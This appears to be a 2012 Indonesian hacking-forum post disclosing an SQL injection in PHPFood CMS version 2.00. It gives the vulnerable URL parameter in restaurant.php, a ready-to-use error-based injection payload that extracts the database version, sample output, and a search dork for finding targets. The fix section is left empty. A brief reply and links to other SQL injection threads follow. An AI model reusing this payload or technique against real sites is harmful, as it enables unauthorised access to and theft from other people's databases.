PHPFood CMS SQL Injection

Subyek: PHPFood CMS SQL Injection Fri Mar 02, 2012 2:01 am

[ Software Information ]

[+] Vendor : http://www.phpfood.com/
[+] Download : http://www.phpfood.com/download.html
[+] version : 2.00 or lower maybe also affected
[+] Vulnerability : SQL INJECTION
[+] Dork : “CiHuY”
[+] LOCATION : INDONESIA – JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[voldemort]/restaurant.php?id=[num]

[ XpL ]

http://127.0.0.1/[voldemort]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

[ See It ]

Duplicate entry ’5.0.91-community1′ for key 1 :D

[ FIX ] :mkipas:

Subyek: Re: PHPFood CMS SQL Injection Fri Mar 02, 2012 10:15 am

yang maybb ada gak bro

» Marinet SQL Injection
» SQL injection v5
» Admin Bot SQL Injection
» Vitalogy web- SQL Injection Vulnerabillity
» SQL injection For Beginner :)